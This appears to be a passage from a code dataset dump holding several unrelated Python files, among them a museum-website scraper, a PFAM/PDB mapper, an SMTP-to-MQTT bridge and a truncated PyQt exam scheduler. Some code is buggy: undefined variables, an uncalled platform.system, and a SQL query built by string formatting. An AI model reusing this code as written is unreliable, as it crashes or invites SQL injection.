mid,eid,oid\n # 将数据添加到数据库中的movie表中\n sql_1 = \"insert into museums(name,imgurl,mobile,address,introduction,opentime) values(%s,%s,%s,%s,%s,%s)\"\n for i in dict1[\"1\"]: \n data_1 = [i[\"name\"],i[\"img\"],i['number'],i['location'],i['description'],i['opentime']]\n try:\n self.cursor.execute(sql_1,data_1)\n self.db.commit() # 提交操作\n except:\n self.db.rollback()\n sql_2 = \"insert into exhibitions(name,imgurl,introduction,mname) values(%s,%s,%s,%s)\"\n for i in dict1[\"2\"]:\n data_2 = [i[\"name\"],i[\"img\"],i['description'],i[\"mname\"]]\n try:\n self.cursor.execute(sql_2,data_2)\n self.db.commit() # 提交操作\n except:\n self.db.rollback()\n\n sql_3 = \"insert into collections(name,imgurl,introduction,mname) values(%s,%s,%s,%s)\"\n for i in dict1[\"3\"]:\n data_3 = [i[\"name\"],i[\"img\"],i['description'],i[\"mname\"]]\n try:\n self.cursor.execute(sql_3,data_3)\n self.db.commit() # 提交操作\n except:\n self.db.rollback()\n\n sql_4 = \"insert into educations(name,imgurl,introduction,time,mname) values(%s,%s,%s,%s,%s)\"\n for i in dict1[\"4\"]:\n data_4 = [i[\"name\"],i[\"img\"],i['description'],i['time'],i[\"mname\"]]\n try:\n self.cursor.execute(sql_4,data_4)\n self.db.commit() # 提交操作\n except:\n self.db.rollback()\n\n self.db.close()\n def dataselect(self, issue, db_table):\n try:\n sql = \"SELECT '%s' FROM %s \" % (issue, db_table)\n self.cursor.execute(sql)\n self.db.commit() # 提交操作\n except:\n self.db.rollback()\n finally:\n return issue\ndef save_data(dict_data):\n # 存数据库\n database = ConnMysql()\n database.insert(dict_data)\n print(\"数据保存\")\n\ndef get_text(url):\n try:\n res = requests.get(url)\n res.raise_for_status()\n res.encoding = res.apparent_encoding\n return res.text\n except:\n return \"\"\n\ndef get_soup1(url):\n text = get_text(url)\n soup = BeautifulSoup(text,\"html.parser\")\n return soup\n\ndef get_soup(url):\n res = requests.get(url,headers = headers)\n res.encoding = 'utf-8'\n soup = BeautifulSoup(res.text,\"html.parser\")\n return soup\n\ndef get_brief(url):\n brief ={}\n soup = get_soup(url)\n print(\"------博物馆简介------\")\n brief = soup.find('div',id = 'j-shareAbstract',style = 'display: none')\n description = brief.text\n brief[\"description\"] = description \n #print(description)\n div = soup.find('div',attrs={'class':'abstract_main'})\n img = div.find('img',attrs={'width':'250'})\n src = img[\"src\"]\n print(\"------参观信息------\")\n visit = soup.find('table',class_ ='abstract_tbl')\n info = visit.find_all('tr')\n for tag in info:\n title = tag.find('th',class_ = 'base-info-card-title')\n #print(title.text+\":\",end=\"\")\n texts = tag.find('div',class_ = 'base-info-card-value').find(text=True).strip()\n #print(texts)\n brief[\"name\"] = \"河南博物院\"\n brief[\"img\"] = src\n brief[\"location\"] = \"中国•河南省郑州市农业路8号\"\n brief[\"number\"] = \"预约电话:0371-63511237、63511239\"\n brief[\"opentime\"] = \"每周二至周日9:00—17:30(冬季开放时间为9:00—17:00)闭馆前1小时停止发放门票\" \n return brief\n\ndef show(url):\n exhibition = {}\n home = \"http://www.chnmus.net\"\n soup = get_soup(url)\n div = soup.find('div',attrs={'class':'fenye_con'})\n title = div.find('div',attrs={'class':'cms-article-tit'})\n exhibition[\"name\"] = title.text\n #print(title.text)\n main = \"\"\n p = div.find_all('p')\n for tag in p:\n main = main+tag.text\n #print(main)\n exhibition[\"description\"] = main\n img = div.find_all(\"img\")\n for tag in img:\n src = home+tag[\"src\"]\n exhibition[\"img\"] = src\n #print(\"展览图示:\"+src)\n break\n exhibition[\"mname\"] = \"河南博物院\"\n return exhibition\n\ndef object(url):\n collection = {}\n home = \"http://www.chnmus.net\"\n soup = get_soup(url)\n div = soup.find('div',attrs={'class':'article-detail'})\n p = div.find_all('p')\n main = \"\"\n for tag in p:\n main = main+tag.text\n #print(main)\n collection[\"description\"] = main\n img = div.find('img')\n src = home+img[\"src\"]\n collection[\"img\"] = src\n collection[\"mname\"] = \"河南博物院\"\n return collection\n #print(\"典藏图片:\"+src)\n\ndef education(url):\n edu = {}\n home = \"http://www.chnmus.net\"\n soup = get_soup(url)\n title = soup.find('div',attrs={'class':'cms-article-tit'})\n edu[\"name\"] = (title.text).strip()\n #print(title.text)\n div = soup.find('div',attrs={'class':'article-detail'})\n p = div.find_all('p')\n main = \"\"\n for tag in p:\n main = main+tag.text\n #print(main)\n edu[\"description\"] = main\n img = div.find('img')\n src = home+img[\"src\"]\n edu[\"img\"] = src\n edu[\"mname\"] = \"河南博物院\"\n return edu\n #print(\"活动写照:\"+src)\n\nurl = \"https://baike.sogou.com/v154572.htm?fromTitle=%E6%B2%B3%E5%8D%97%E5%8D%9A%E7%89%A9%E9%99%A2\"\nx = get_brief(url)\na = []\na.append(x)\n\n\nurl = \"http://www.chnmus.net/sitesources/hnsbwy/page_pc/index.html\"\nsoup = get_soup(url)\nserve = soup.find('div',attrs={'class':'serve'})\np = serve.find_all('p')\nmain = \"\"\nfor tag in p:\n main = main+tag.text\nprint(main)\n\nexhibitions = []\nprint(\"-----展览陈列------\")\nurl = \"http://www.chnmus.net/sitesources/hnsbwy/page_pc/clzl/jbcl/article002d7515354c450e856bd18beaffb31b.html\"\nx = show(url)\nexhibitions.append(x)\nprint(\"\\n\")\nurl = \"http://www.chnmus.net/sitesources/hnsbwy/page_pc/clzl/jbcl/article3cddca58e4b7478cb9015e4722aad850.html\"\nx = show(url)\nexhibitions.append(x)\nprint(\"\\n\")\nurl = \"http://www.chnmus.net/sitesources/hnsbwy/page_pc/clzl/jbcl/articlee6d24ddc29894645bc1a9167423ce63a.html\"\nx = show(url)\nexhibitions.append(x)\nprint(\"\\n\")\n\ncollections = []\nprint(\"------典藏珍品------\")\nurl = \"http://www.chnmus.net/sitesources/hnsbwy/page_pc/dzjp/zyzb/article492822bf0c494d6a80aa86ba5f7d74e6.html\"\ny = object(url)\ny[\"name\"] = \"云纹铜禁\"\ncollections.append(y)\nprint(\"\\n\")\nurl = \"http://www.chnmus.net/sitesources/hnsbwy/page_pc/dzjp/zyzb/articlee741d1d8b69c414a8fa991cda1087847.html\"\ny = object(url)\ny[\"name\"] = \"贾湖骨笛\"\ncollections.append(y)\nprint(\"\\n\")\nurl = \"http://www.chnmus.net/sitesources/hnsbwy/page_pc/dzjp/zyzb/article98cd402c5069437393e9b94265147fe1.html\"\ny = object(url)\ny[\"name\"] = \"玉柄铁剑\"\ncollections.append(y)\nprint(\"\\n\")\nurl = \"http://www.chnmus.net/sitesources/hnsbwy/page_pc/dzjp/zyzb/article39894039da684cc69a3528a41f93acfc.html\"\ny = object(url)\ny[\"name\"] = \"莲鹤方壶\"\ncollections.append(y)\nprint(\"\\n\")\nurl = \"http://www.chnmus.net/sitesources/hnsbwy/page_pc/dzjp/zyzb/articlef765a934c73342d1a1648e9eaddb678d.html\"\ny = object(url)\ny[\"name\"] = \"武则天金简\"\ncollections.append(y)\nprint(\"\\n\")\n\neducational = []\nprint(\"------教育活动------\")\nurl = \"http://www.chnmus.net/sitesources/hnsbwy/page_pc/ppjy/zylswhxjt/xjtdt/article76f8fc6727d74d32bc8655114fea3822.html\"\nz = education(url)\nz[\"time\"] = \"发布日期:2019-04-22\"\neducational.append(z)\nprint(\"\\n\")\nurl = \"http://www.chnmus.net/sitesources/hnsbwy/page_pc/ppjy/sjhd/article758c1ff1792f4cc68808267daad9f5e9.html\"\nz = education(url)\nz[\"time\"] = \"发布日期:2017-11-09\"\neducational.append(z)\nprint(\"\\n\")\nurl = \"http://www.chnmus.net/sitesources/hnsbwy/page_pc/ppjy/sqsehdj/articleba2d393d05814f4388396ba3ba8f8c24.html\"\nz = education(url)\nz[\"time\"] = \"发布日期:2019-07-22\"\neducational.append(z)\nprint(\"\\n\")\n\nmuseum_info[\"1\"] = a\nmuseum_info[\"2\"] = []#exhibitions\nmuseum_info[\"3\"] = []#collections\nmuseum_info[\"4\"] = []#educational\n\nsave_data(museum_info)","sub_path":"src/博物馆爬取陈润/河南博物院.py","file_name":"河南博物院.py","file_ext":"py","file_size_in_byte":8774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"193383520","text":"NAMES = ['arnold schwarzenegger', 'alec baldwin', 'bob belderbos',\n 'julian sequeira', 'sandra bullock', 'keanu reeves',\n 'julbob pybites', 'bob belderbos', 'julian sequeira',\n 'al pacino', 'brad pitt', 'matt damon', 'brad pitt']\n\n\ndef dedup_and_title_case_names(names):\n \"\"\"Should return a list of title cased names,\n each name appears only once\"\"\"\n non_dup_lst = []\n for x in names:\n if x not in non_dup_lst:\n non_dup_lst.append(x)\n non_dup_lst = [element.title() for element in non_dup_lst]\n return non_dup_lst\n\n\ndef sort_by_surname_desc(names):\n \"\"\"Returns names list sorted desc by surname\"\"\"\n names = dedup_and_title_case_names(names)\n names.sort(key=lambda x: x.split()[1])\n return names\n\n\ndef shortest_first_name(names):\n \"\"\"Returns the shortest first name (str).\n You can assume there is only one shortest name.\n \"\"\"\n names = dedup_and_title_case_names(names)\n first_name = [x.split()[0] for x in names]\n shortest_name = min(first_name, key=len)\n return shortest_name","sub_path":"125_algorithms/_examples/_algorithms_challenges/pybites/beginner/005_parse_list_of_names/save2_nopass.py","file_name":"save2_nopass.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"589783919","text":"import argparse\r\nfrom collections import defaultdict\r\n\r\n\r\ndef PFAM_ID(input_file):\r\n \"\"\"file with pfam accession list\"\"\"\r\n pfam_ids = open(input_file)\r\n lines=pfam_ids.readlines()\r\n strip_pfam_ids = [line.strip().split('.')[0] for line in lines ]\r\n\r\n pfam_ids.close()\r\n return strip_pfam_ids\r\n\r\ndef pdb_pfam_mapping(input_file):\r\n \"\"\" pdb_pfam_mapping\r\n columns: 0=PDB_ID; 1=CHAIN_ID; 2=RES_NUM_START; 3=RES_NUM_STOP; 4=PFAM_ACC \"\"\"\r\n mapping = open(input_file)\r\n mapping_lines=mapping.readlines()\r\n mapping.close()\r\n dic_out= defaultdict(list)\r\n for line in mapping_lines:\r\n split_mapping_lines=line.split(\"\\t\")\r\n pfam = split_mapping_lines[4].split('.')[0]\r\n dominio_pdb={'pdb':split_mapping_lines[0], 'chain':split_mapping_lines[1],\r\n 'start':split_mapping_lines[2], 'stop':split_mapping_lines[3]}\r\n dic_out[pfam].append(dominio_pdb)\r\n\r\n\r\n return dic_out\r\n\r\ndef id_cross(PFAM_data, mapping_data):\r\n \"\"\"Cross IDs between inputs file\"\"\"\r\n\r\n for pfam in PFAM_data:\r\n if pfam in mapping_data:\r\n for pdb in mapping_data[pfam]:\r\n print(pfam+\"\\t\"+ f'{pdb[\"pdb\"]}\\t{pdb[\"chain\"]}\\t{pdb[\"start\"]}\\t{pdb[\"stop\"]}')\r\n return 0\r\n\r\n\r\ndef parse_arguments():\r\n\r\n parser = argparse.ArgumentParser(description='Extract PDB from PFAM IDs')\r\n parser.add_argument(\"-l\", '--PFAM_list', default=None, help=\"Input file should have PFAM ID list\")\r\n parser.add_argument(\"-m\", '--mapping_pdb_pfam', default=\"pdb_pfam_mapping.txt\", help=\"Input file of PDB and PFAM ID link: ftp://ftp.ebi.ac.uk/pub/databases/Pfam/mappings/pdb_pfam_mapping.txt \")\r\n\r\n return parser\r\n\r\ndef main():\r\n\r\n parser=parse_arguments()\r\n args=parser.parse_args()\r\n\r\n id_cross(PFAM_ID(args.PFAM_list), pdb_pfam_mapping(args.mapping_pdb_pfam))\r\n return 0\r\n\r\n\r\nif __name__=='__main__':\r\n main()\r\n","sub_path":"extracts/extract_pdb_from_domain.py","file_name":"extract_pdb_from_domain.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"371155757","text":"from PIL import Image\nimport numpy as np\n\n\nclass Trainer:\n\n def __init__(self, extractor, classifier):\n self.extractor = extractor\n self.classifier = classifier\n\n def openAnnoFile(self, fileName):\n Ref = {}\n refFile = open(fileName)\n\n words = refFile.read()\n\n lines = words.split('\\n')\n\n for line in lines:\n lineArr = line.split('\t')\n if len(lineArr) <= 1:\n break\n\n imgName, digClass = lineArr\n Ref[imgName] = digClass\n\n return Ref\n\n def featuresResultContainer(self):\n featuresCont = {}\n\n for x in xrange(10):\n featuresCont[x] = [[] for i in range(self.extractor.totalFeatures())] # to contain the feature for each digit\n\n return featuresCont\n\n def train(self, trainRef, featuresCont, filename):\n digClass = trainRef[filename]\n digClass = int(digClass)\n\n image = Image.open(\"Train_set_processed/\" + filename)\n\n imageArr = np.asarray(image.convert(\"L\"))\n\n feature = featuresCont.get(digClass)\n\n for index, featureValue in enumerate(self.extractor.extractFeatures(imageArr)):\n feature[index].append(featureValue)\n\n featuresCont[digClass] = feature\n\n def executeOnDev(self, ref, fileName):\n image = Image.open(\"Dev_set_processed/\" + fileName)\n\n imageArr = np.asarray(image.convert(\"L\"))\n\n features = self.extractor.extractFeatures(imageArr)\n\n return self.classifier.classify(ref, features)\n\n def executeOnTest(self, ref, fileName):\n image = Image.open(\"Test_set_processed/\" + fileName)\n\n imageArr = np.asarray(image.convert(\"L\"))\n\n features = self.extractor.extractFeatures(imageArr)\n\n return self.classifier.classify(ref, features)\n\n def record(self, AnnoFile):\n record = {}\n for digClass in range(0, 10):\n dig = []\n features = AnnoFile.get(digClass)\n\n for feature in features:\n mean = np.mean(feature)\n std = np.std(feature)\n dig.append((mean, std))\n\n record[digClass] = dig\n\n return record\n","sub_path":"phase#3/system-one/Trainer.py","file_name":"Trainer.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"133044514","text":"#!/usr/bin/env python3\nimport os\nimport time\nimport asyncore\nimport logging\nfrom datetime import datetime\nfrom smtpd import SMTPServer\n\nfrom paho.mqtt import publish\n\n\ndefaults = {\n 'SMTP_PORT': 1025,\n 'MQTT_HOST': 'localhost',\n 'MQTT_PORT': 1883,\n 'MQTT_USERNAME': '',\n 'MQTT_PASSWORD': '',\n 'MQTT_TOPIC': 'emqtt',\n 'MQTT_PAYLOAD': 'ON',\n 'DEBUG': False\n}\nconfig = {\n setting: os.environ.get(setting, default)\n for setting, default in defaults.items()\n}\nlevel = logging.DEBUG if config['DEBUG'] == 'True' else logging.INFO\n\nlog = logging.getLogger()\nlog.setLevel(level)\nch = logging.StreamHandler()\nfh = logging.FileHandler('emqtt.log')\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nfh.setFormatter(formatter)\nch.setFormatter(formatter)\nlog.addHandler(ch)\nlog.addHandler(fh)\n\n\nclass EmailServer(SMTPServer):\n def process_message(self, peer, mailfrom, rcpttos, data, **kwargs):\n log.debug('Mail from: {}\\nContent (truncated): {}'.format(mailfrom, data[:250]))\n try:\n payload = config['MQTT_PAYLOAD']\n topic = '{}/{}'.format(config['MQTT_TOPIC'], mailfrom.replace('@', ''))\n log.debug('Publishing \"%s\" to %s', payload, topic)\n self.mqtt_publish(topic, payload)\n except Exception as e:\n log.exception('Failed publishing')\n \n def mqtt_publish(self, topic, payload):\n publish.single(\n topic,\n payload,\n hostname=config['MQTT_HOST'],\n port=config['MQTT_PORT'],\n auth={\n 'username': config['MQTT_USERNAME'],\n 'password': config['MQTT_PASSWORD']\n } if config['MQTT_USERNAME'] else None\n )\n\n\ndef run():\n foo = EmailServer(\n ('0.0.0.0', config['SMTP_PORT']),\n None # remoteaddr\n )\n try:\n asyncore.loop()\n except KeyboardInterrupt:\n pass\n\n\nif __name__ == '__main__':\n log.debug(', '.join([f'{k}={v}' for k, v in config.items()]))\n log.info('Running')\n run()\n","sub_path":"emqtt.py","file_name":"emqtt.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"346466069","text":"import datetime, random, string, platform, pytz\nfrom json import load, dump\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom apscheduler.schedulers.background import BackgroundScheduler\nfrom apscheduler.jobstores.sqlalchemy import SQLAlchemyJobStore\nfrom apscheduler.executors.pool import ThreadPoolExecutor, ProcessPoolExecutor\n\n\n\njobstores = {\n 'default': SQLAlchemyJobStore(url='sqlite:///jobs.sqlite')\n}\nexecutors = {\n 'default': ThreadPoolExecutor(20),\n 'processpool': ProcessPoolExecutor(5)\n}\njob_defaults = {\n 'coalesce': False,\n 'max_instances': 3\n}\nscheduler = BackgroundScheduler(jobstores=jobstores, executors=executors, job_defaults=job_defaults, timezone=pytz.utc)\nscheduler.start()\n\n\n\nlistofsubjects = [\"English\", \"Math\", \"Languages\",\n \"Business\", \"Economics\", \"Geography\", \"History\", \"Psychology\",\n \"Biology\", \"Chemistry\", \"Physics\", \"Computers\", \"Sports Science\",\n \"Film\", \"Music\", \"Theatre\", \"Art\"]\n\nsubjectgroups = {'english': [\"English\"],\n 'math': [\"Math\"],\n 'foreignlanguage': [\"Languages\"],\n 'humanities': [\"Business\", \"Economics\", \"Geography\", \"History\", \"Psychology\"],\n 'sciences': [\"Biology\", \"Chemistry\", \"Physics\", \"Computers\", \"Sports Science\"],\n 'extras': [\"Film\", \"Music\", \"Theatre\", \"Art\"]}\n\n# Colour coding lookup table\ncolour_dict = {\n 'english': '#66b3ff', # Blue\n 'math': '#9999ff', # Light purple\n 'foreignlanguage': '#e3cd4f', # Yellow\n 'sciences': '#91bc8f', # Green\n 'humanities': '#fc9b1d', # Orange\n 'extras': '#ff8084', # Red\n\n}\n\n\ndef daysBetween(date2):\n one_day = 1000 * 60 * 60 * 24\n date1_ms = datetime.datetime.now().date()\n date2_ms = date2\n difference_delta = date2_ms - date1_ms # returns a timedelta object\n difference_ms = difference_delta.total_seconds() * 1000\n return round(difference_ms / one_day)\n\n\ndef datefromiso(datestring):\n return datestring.split('T', 1)[0]\n\n\ndef randomiser_for_ids():\n numbers = [str(i) for i in range(0, 10)]\n ASCII = list(string.ascii_letters) + numbers * 2\n random_id = [random.choice(ASCII) for i in range(0, 10)]\n return ''.join(random_id)\n\n\ndef writetoJSON(dictobj, file='memory.json', ):\n with open(file, mode='r+') as memory:\n s = memory.read().replace(']', '')\n memory.seek(0)\n memory.truncate()\n memory.write(s)\n # Leaves an unclosed parentheses\n\n with open(file, mode=\"a\") as memory:\n memory.write(', \\n')\n dump(dictobj, memory, indent=3)\n memory.write(']')\n # Closes that parentheses\n\n\ndef stylehandler(self):\n with open('theme.json', mode='r') as memory:\n s = load(memory)\n if s[\"darktheme\"]:\n self.setdarktheme()\n theme = '''{\"darktheme\":true}'''\n else:\n self.setlighttheme()\n theme = '''{\"darktheme\":false}'''\n\n\ndef setdarktheme(self):\n with open('dark.qss', 'r') as theme:\n self.MainWindow.setStyleSheet(theme.read())\n\n\ndef setlighttheme(self):\n with open('light.qss', 'r') as theme:\n self.MainWindow.setStyleSheet(theme.read())\n\n\nif platform.system == \"Linux\":\n import notify2\n\n notify2.init('App Name')\n\n\n def notification(title, text, icon=None):\n n = notify2.Notification(title, text, icon)\n\nif platform.system == \"Windows\":\n from win10toast import ToastNotifier\n\n toaster = ToastNotifier()\n\n\n def notification(title, text, icon=None):\n toaster.show_toast(title, text, icon_path=icon, threaded=True)\n\nif platform.system() == \"Darwin\":\n import applescript\n\n\n def notification(title, text, icon=None):\n command = 'display notification ' + '\\\"' + text + '\\\"'\n applescript.run(command, background=True)\n\n\nclass Ui_MainWindow(QtWidgets.QMainWindow): # Most of this is autogenerated UI setup\n def __init__(self, MainWindow, parent=None):\n super(QtWidgets.QMainWindow, self).__init__(parent)\n MainWindow.setObjectName(\"Exam Scheduler\")\n MainWindow.resize(656, 581)\n self.MainWindow = MainWindow\n\n self.centralWidget = QtWidgets.QWidget(MainWindow)\n self.centralWidget.setObjectName(\"centralWidget\")\n self.verticalLayoutWidget = QtWidgets.QWidget(self.centralWidget)\n self.verticalLayoutWidget.setGeometry(QtCore.QRect(9, 10, 271, 435))\n self.verticalLayoutWidget.setObjectName(\"verticalLayoutWidget\")\n self.verticalLayout = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)\n self.verticalLayout.setSizeConstraint(QtWidgets.QLayout.SetMinAndMaxSize)\n self.verticalLayout.setContentsMargins(11, 11, 11, 11)\n self.verticalLayout.setSpacing(6)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.todaybutton = QtWidgets.QPushButton(self.verticalLayoutWidget)\n self.todaybutton.setMinimumSize(QtCore.QSize(0, 0))\n self.todaybutton.setMaximumSize(QtCore.QSize(16777215, 50))\n\n self.todaybutton.setObjectName(\"todaybutton\")\n self.verticalLayout.addWidget(self.todaybutton)\n self.weekbutton = QtWidgets.QPushButton(self.verticalLayoutWidget)\n self.weekbutton.setMinimumSize(QtCore.QSize(0, 0))\n self.weekbutton.setMaximumSize(QtCore.QSize(16777215, 50))\n\n self.weekbutton.setObjectName(\"weekbutton\")\n self.verticalLayout.addWidget(self.weekbutton)\n self.eventlist = QtWidgets.QListWidget(self.verticalLayoutWidget)\n self.eventlist.setMaximumSize(QtCore.QSize(16777215, 270))\n self.eventlist.setWordWrap(True)\n self.eventlist.setObjectName(\"eventlist\")\n item = QtWidgets.QListWidgetItem()\n font = QtGui.QFont()\n font.setPointSize(15)\n font.setBold(True)\n font.setItalic(True)\n font.setWeight(75)\n item.setFont(font)\n self.eventlist.addItem(item)\n self.verticalLayout.addWidget(self.eventlist)\n self.calendarbutton = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Maximum)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.calendarbutton.sizePolicy().hasHeightForWidth())\n self.calendarbutton.setSizePolicy(sizePolicy)\n self.calendarbutton.setMinimumSize(QtCore.QSize(0, 45))\n self.calendarbutton.setObjectName(\"calendarbutton\")\n self.verticalLayout.addWidget(self.calendarbutton)\n self.newexambutton = QtWidgets.QPushButton(self.centralWidget)\n self.newexambutton.setGeometry(QtCore.QRect(480, 20, 161, 31))\n self.newexambutton.setMaximumSize(QtCore.QSize(200, 16777215))\n self.newexambutton.setObjectName(\"newexambutton\")\n self.label_4 = QtWidgets.QLabel(self.centralWidget)\n self.label_4.setGeometry(QtCore.QRect(320, 30, 91, 51))\n self.label_4.setTextFormat(QtCore.Qt.RichText)\n self.label_4.setObjectName(\"label_4\")\n self.gridlayout = QtWidgets.QWidget(self.centralWidget)\n self.gridlayout.setGeometry(QtCore.QRect(290, 80, 361, 361))\n self.gridlayout.setObjectName(\"gridlayout\")\n self.gridLayout = QtWidgets.QGridLayout(self.gridlayout)\n self.gridLayout.setContentsMargins(11, 11, 11, 11)\n self.gridLayout.setSpacing(6)\n self.gridLayout.setObjectName(\"gridLayout\")\n self.changemodebutton = QtWidgets.QPushButton(self.centralWidget)\n self.changemodebutton.setGeometry(475, 450, 165, 40)\n self.changemodebutton.setText(\"Change Color Scheme\")\n self.newsessionbutton = QtWidgets.QPushButton(self.centralWidget)\n self.newsessionbutton.setGeometry(QtCore.QRect(478, 70, 161, 31))\n self.newsessionbutton.setMaximumSize(QtCore.QSize(200, 16777215))\n self.newsessionbutton.setObjectName(\"newsessionbutton\")\n MainWindow.setCentralWidget(self.centralWidget)\n self.menuBar = QtWidgets.QMenuBar(MainWindow)\n self.menuBar.setGeometry(QtCore.QRect(0, 0, 656, 22))\n self.menuBar.setObjectName(\"menuBar\")\n MainWindow.setMenuBar(self.menuBar)\n self.mainToolBar = QtWidgets.QToolBar(MainWindow)\n self.mainToolBar.setObjectName(\"mainToolBar\")\n MainWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.mainToolBar)\n self.statusBar = QtWidgets.QStatusBar(MainWindow)\n self.statusBar.setObjectName(\"statusBar\")\n MainWindow.setStatusBar(self.statusBar)\n\n\n # Function calls and connections\n self.todaybutton.clicked.connect(lambda: self.displaycheckboxestoday('memory.json'))\n self.weekbutton.clicked.connect((lambda: self.displaycheckboxesweek('memory.json')))\n self.newsessionbutton.clicked.connect(lambda: self.createsessionform())\n self.changemodebutton.clicked.connect(lambda: self.changetheme())\n self.newexambutton.clicked.connect(lambda: self.createform())\n self.calendarbutton.clicked.connect(lambda: self.showcalendar())\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n with open('theme.json', 'a'):\n if os.stat(themepath).st_size==0:\n theme.write('''{\"darktheme\":false}''')\n\n with open('memory.json', 'a'):\n if os.stat(themepath).st_size==0:\n memory.write('''\n [{\n \"type\": \"Project\",\n \"subject\": \"Chemistry\",\n \"deadline\": \"2019-03-10T00:00:00\",\n \"wordcount\": 100,\n \"chaptercount\": 0,\n \"notes\": \"Essay\",\n \"plan\": \"Essay\",\n \"name\": \"RP2 Chemistry\"\n },\n {\n \"event_id\": \"Q69oz5q2iw\",\n \"name\": \"\",\n \"subject\": \"Chemistry\",\n \"description\": \"Essay\",\n \"plan\": \"Research background\",\n \"type\": \"session\",\n \"start_time\": \"2019-03-09T09:00:00Z\",\n \"end_time\": \"2019-03-09T10:30:00Z\"\n }]\n ''')\n # Initialise the files, to avoid potential name errors or file not found errors\n\n with open('theme.json', mode='r') as memory:\n s = load(memory)\n try:\n if s[\"darktheme\"]:\n self.setdarktheme()\n theme = '''{\"darktheme\":true}'''\n else:\n self.setlighttheme()\n theme = '''{\"darktheme\":false}'''\n except FileNotFoundError or FileExistsError:\n self.setlighttheme()\n theme = '''{\"darktheme\":true}'''\n with open('theme.json', mode='w') as memory:\n memory.write(theme)\n # Reads the theme, and sets accordingly\n\n self.retranslateUi(MainWindow)\n self.listfrommemory('memory.json')\n self.displaycheckboxestoday('memory.json')\n\n def retranslateUi(self, MainWindow): # Again, mostly auto-generated\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"Exam Scheduler\", \"Exam Scheduler\"))\n self.todaybutton.setAccessibleName(_translate(\"MainWindow\", \"todaybutton\"))\n self.todaybutton.setText(_translate(\"MainWindow\", \"Today\"))\n self.weekbutton.setAccessibleName(_translate(\"MainWindow\", \"weekbutton\"))\n self.weekbutton.setText(_translate(\"MainWindow\", \"Next 7 Days\"))\n self.eventlist.setAccessibleName(_translate(\"MainWindow\", \"eventlist\"))\n __sortingEnabled = self.eventlist.isSortingEnabled()\n self.eventlist.setSortingEnabled(False)\n item = self.eventlist.item(0)\n item.setText(_translate(\"MainWindow\", \"All Deadlines\"))\n self.eventlist.setSortingEnabled(__sortingEnabled)\n self.calendarbutton.setAccessibleName(_translate(\"MainWindow\", \"calendarbutton\"))\n self.calendarbutton.setText(_translate(\"MainWindow\", \"View in Calendar\"))\n self.newexambutton.setAccessibleName(_translate(\"MainWindow\", \"newexambutton\"))\n self.newexambutton.setText(_translate(\"MainWindow\", \"New Exam\"))\n self.label_4.setText(_translate(\"MainWindow\",\n \"

    Today

    \"))\n\n self.newsessionbutton.setAccessibleName(_translate(\"MainWindow\", \"newsessionbutton\"))\n self.newsessionbutton.setText(_translate(\"MainWindow\", \"New Session\"))\n\n def listfrommemory(self, memfile='memory.json'): # Read events from memory, and create the list of deadlines\n # Requires a highly specific data structure.\n with open(memfile, 'r') as memory:\n date_today = datetime.datetime.now().date().isoformat()\n acceptable_args = ['deadline', 'exam', 'project', 'other'] # All things which are not sessions\n deadlines = [thing for thing in load(memory) if\n thing['type'].lower() in acceptable_args] # If thing is a deadline/project/whatever\n upcoming_deadlines = [thing for thing in deadlines if thing['deadline'] >= date_today]\n upcoming_deadlines = sorted(upcoming_deadlines, key=lambda k: k['deadline']) # Sorts by date\n for thing in upcoming_deadlines:\n x = thing['name'].upper()\n y = '[' + thing['subject'] + ']:' # For visual/style reasons\n z = thing['deadline'].split('T', 1)[0] # removes the time portion of datetime string\n item = QtWidgets.QListWidgetItem(x + y + z)\n for key, value in subjectgroups.items(): # This block colour codes the session appropriately.\n # Probably not the most elegant code in the world, but it works\n if thing['subject'] in value:\n item.setBackground(QtGui.QColor(colour_dict[key]))\n break\n self.eventlist.addItem(item)\n linebreak = QtWidgets.QListWidgetItem('')\n self.eventlist.addItem(linebreak)\n # Just for aesthetic reasons, leave linebreaks in\n\n def displaycheckboxestoday(self, memory): # Displays 'TO-DO' articles for the day based on the memory file\n for i in reversed(range(self.gridLayout.count())):\n self.gridLayout.itemAt(i).widget().setParent(None)\n boxnumber = 0 # Specifies the position/index\n date_today = datetime.datetime.now().date() # Returns today's date in ISO format(date only)\n date_today = str(date_today)\n self.label_4.setText(\n \"

    Today

    \")\n with open(memory, 'r') as jsonmem:\n # Get all today's events using iso date handling\n sessions = [item for item in load(jsonmem) if item['type'].lower() == 'session']\n today_sessions = [item for item in sessions if datefromiso(item['start_time']) == date_today]\n today_sessions = sorted(today_sessions, key=lambda k: k['start_time'])\n for item in today_sessions:\n self.eventcheckbox = QtWidgets.QCheckBox(self.gridlayout)\n self.eventcheckbox.setText(item['description'])\n for key, value in subjectgroups.items(): # Colour codes the session appropriately.\n if item['subject'] in value:\n self.eventcheckbox.setStyleSheet(\"background-color:\" + colour_dict[key] + '; \\n')\n break\n self.gridLayout.addWidget(self.eventcheckbox, boxnumber, 0, 1, 1)\n boxnumber += 1\n\n def displaycheckboxesweek(self, memory): # Displays 'TO-DO' articles for the next 7 days\n for i in reversed(range(self.gridLayout.count())):\n self.gridLayout.itemAt(i).widget().setParent(None)\n boxnumber = 0\n date_today = datetime.datetime.now().date() # Returns today's date in ISO format(date only)\n date_today = datefromiso(str(date_today))\n weeklater =(datetime.datetime.now() + 